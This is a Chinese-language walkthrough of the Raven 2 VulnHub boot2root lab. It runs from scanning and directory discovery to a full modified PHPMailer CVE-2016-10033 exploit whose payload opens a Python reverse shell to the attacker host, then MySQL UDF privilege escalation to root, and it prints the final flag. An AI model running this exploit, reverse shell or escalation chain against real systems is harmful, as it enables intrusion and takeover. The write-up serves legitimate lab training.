0x00 前言
Raven 2是一個中等難度的boot2root 虛擬靶機。有四個flag需要找出。在多次被攻破后,Raven Security采取了額外措施來增強他們的網絡服務器安全以防止黑客入侵。
靶機下載地址:https://download.vulnhub.com/raven/Raven2.ova
0x01 存活主機
1.在windows上的scan ports工具對目標整個網段(192.168.1.0/24)進行掃描發現192.168.1.12就是目標靶機,並開放了80,22,111端口。
2.在linux下可通過arp-scan和netdiscover命令進行主機存活探測,發現192.168.1.101是目標靶機.
root@backlion#arp-scan -l
or
root@backlion#netdiscover -r192.168.1.0/24
0x02 端口探測
1.通過namp對目標主機進行端口掃描
nmap -A192.168.1.12
2.發現22,80和111端口是開放的,其中80端口運行了一個web應用,可以通過入侵web進入系統,爆破22端口由於目標靶機設置的系統口令太強,這里不建議爆破。
0x02 目錄猜解
1.在linux中可以使用dirb進行目錄掃描
2.同時也可以在windows上通過dirbuster進行目錄掃描,更直觀地看出目錄結構。
3.掃到幾個一級目錄,一個個查看下文件的內容,在/vendor/目錄下發現了兩個有趣的東西:http://192.168.1.32/vendor/PATH,可以看到flag1和絕對路徑
4.訪問http://192.168.1.12/vendor/VERSION,發現某個軟件的版本號,但不知道具體是那個軟件。
同時目錄下還存在一個PHPMailerAutoload.php的文件,配合起來看應該是使用了5.2.16版本的PHPMailer。
0x03 反彈SHELL
1.在kali上可以直接通過serachsploit進行搜索phpmailer存在漏洞的exp
root@kali2018:~# searchsploit phpmailer
------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service | exploits/php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution (Bash) | exploits/php/webapps/40968.php
PHPMailer < 5.2.18 - Remote Code Execution (PHP) | exploits/php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution (Python) | exploits/php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | exploits/multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution | exploits/php/webapps/40969.pl
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Exe | exploits/php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure | exploits/php/webapps/43056.py
WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit) | exploits/php/remote/42024.rb
------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
cp /usr/share/exploitdb/exploits/php/webapps/40974.py /opt
cd /opt
2、也可以到exploit-db.com搜索,並發現利用exp地址:
https://www.exploit-db.com/exploits/40974
簡單修改一下exp:
a.頂部加上# -*- coding: utf-8 -*-聲明,否則注釋里一大堆非ASCII字符會報錯。
b.修改target為靶機IP地址,利用文件為contact.php。
c.修改后門文件路徑名稱。也不知道為什么,用默認的backdoor.php總是利用不成功,把payload改成shell.php最終利用成功。
d. 修改反彈shell的地址為nc監聽服務器的ip(KALI主機IP)和端口。
e.運行該python腳本需要安裝對應的包(pip install requests-toolbelt),如下地址下載並手動安裝
3.最終修改成的POC:
# -*- coding: utf-8 -*- from requests_toolbelt import MultipartEncoder import requests import os import base64 from lxml import html as lh os.system('clear') print("\n") print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ") print("██╔══██╗████╗██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗") print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝") print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗") print("██║██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║") print("╚═╝╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝╚═╝") print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com") print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n") target = 'http://192.168.1.12/contact.php' backdoor = '/backlion.php' payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.1.11\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>' fields={'action': 'submit', 'name': payload, 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/backlion.php server\" @protonmail.com', 'message': 'Pwned'} m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe') headers={'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type} proxies = {'http': 'localhost:8081', 'https':'localhost:8081'} print('[+] SeNdiNG eVIl SHeLL To TaRGeT....') r = requests.post(target, data=m.to_string(), headers=headers) print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D') r = requests.get(target+backdoor, headers=headers) if r.status_code == 200: print('[+]ExPLoITeD ' + target)
然后執行exp,可以看到生成了一個利用用文件contact.php
6.訪問contact.php(http://192.168.1.12/contact.php),此時就會生成后門文件shell.php
7.接着訪問后門文件:http://192.168.1.12/shell.php
8.開啟nc服務器監聽,在服務器上得到反彈shell
9.進入到wordpress目錄下的配置文件。然后查看其數據庫配置連接信息
cd /var/www/html/wordpress
cat wp-config.php
10.查看一下mysql的運行權限(可以看到mysql是以root運行,並且也顯示了mysql的plugin目錄)
ps -ef|grep mysql
11.進入mysql數據庫終端,可以查看數據庫的版本,也可以查看plugin目錄
www-data@Raven:/var/www/html/wordpress$ mysql -u root -pR@v3nSecurity
12. nc模式下的shell不支持su交互,先利用python提升到偽終端
python -c "import pty;pty.spawn('/bin/bash')"
進入到網站目錄頁面發現存在flag2.txt
cd /var/www
cat flag2.txt
13.接下來直接先全局搜flag:
www-data@Raven:/var/www/html$ find / -name "flag*"
找到flag3,是圖片,直接訪問
http://192.168.1.13/wordpress/wp-content/uploads/2018/11/flag3.png
14.然后切換到/tmp目錄,下載LinEnum.sh腳本,該腳本是一個用於枚舉許多基本和高級linux詳細信息的腳本。
cd /tmp
wget http://192.168.1.109/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh
我們發現了MySQL-Exploit-Remote-Root-Code-Execution-Privesc漏洞!(更多信息:https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html)
15.接着就是利用提權exp的利用了https://www.exploit-db.com/exploits/1518在攻擊機KALI主機上進行編譯生成so文件:
root@kali2018:~# wget http://192.168.1.5/raptor_udf.c #kali系統必須是64位系統,不然會報錯
root@kali2018:~# gcc -g -c raptor_udf.c
root@kali2018:~# gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
16.從攻擊機上下載提權利用exp文件: raptor_udf2.so
www-data@Raven:/var/www/html/wordpress$ cd /tmp
www-data@Raven:/tmp$ wget http://192.168.1.11:8080/raptor_udf2.so
然后通過mysql進行UDF提權(執行sql語句,其中dumpfile的路徑要根據前面進程列出來的plugin目錄(plugin-dir=/usr/lib/mysql/plugin)改動一下):
mysql> use mysql; use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> create table foo(line blob); create table foo(line blob); Query OK, 0 rows affected (0.08 sec) mysql> insert into foo values(load_file('/tmp/raptor_udf.so')); insert into foo values(load_file('/tmp/raptor_udf.so')); Query OK, 1 row affected (0.01 sec) mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so'; select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so'; Query OK, 1 row affected (0.11 sec) mysql> create function do_system returns integer soname 'raptor_udf.so'; create function do_system returns integer soname 'raptor_udf.so'; Query OK, 0 rows affected (0.00 sec) mysql> select * from mysql.func; select * from mysql.func; +-----------+-----+---------------+----------+ | name | ret | dl | type | +-----------+-----+---------------+----------+ | do_system | 2 | raptor_udf.so | function | +-----------+-----+---------------+----------+ 1 row in set (0.00 sec) mysql> select do_system('chmod u+s /usr/bin/find'); select do_system('chmod u+s /usr/bin/find'); +--------------------------------------+ | do_system('chmod u+s /usr/bin/find') | +--------------------------------------+ | 0 | +--------------------------------------+ 1 row in set (0.01 sec) mysql> exit exit Bye www-data@Raven:/tmp$ touch finn touch finn www-data@Raven:/tmp$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@Raven:/tmp$ find finn -exec "/bin/sh" \; find finn -exec "/bin/sh" \; # whoami whoami root #
17.最后進入到root目錄,可以查看到falg4.txt
# cd /root
cd /root
# ls
# cat flag4.txt
cat flag4.txt
___ ___ ___
| _ \__ ___ _____ _ _ |_ _|_ _|
| / _` \ V / -_) ' \ | | | |
|_|_\__,_|\_/\___|_||_|___|___|
flag4{df2bc5e951d91581467bb9a2a8ff4425}
